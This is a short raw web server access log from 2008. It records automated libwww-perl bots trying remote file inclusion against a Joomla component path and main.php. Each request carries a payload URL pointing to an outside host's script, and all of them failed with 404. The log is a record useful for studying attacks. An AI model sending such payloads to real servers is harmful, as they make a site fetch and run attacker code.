208.226.79.133 - - [15/Jun/2008:18:45:02 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://beeez.com/archives/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
208.226.79.133 - - [15/Jun/2008:18:45:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://beeez.com/archives/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:45:38 -0700] "GET /logs/access_080414.log/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:45:38 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
150.165.231.5 - - [15/Jun/2008:18:45:39 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
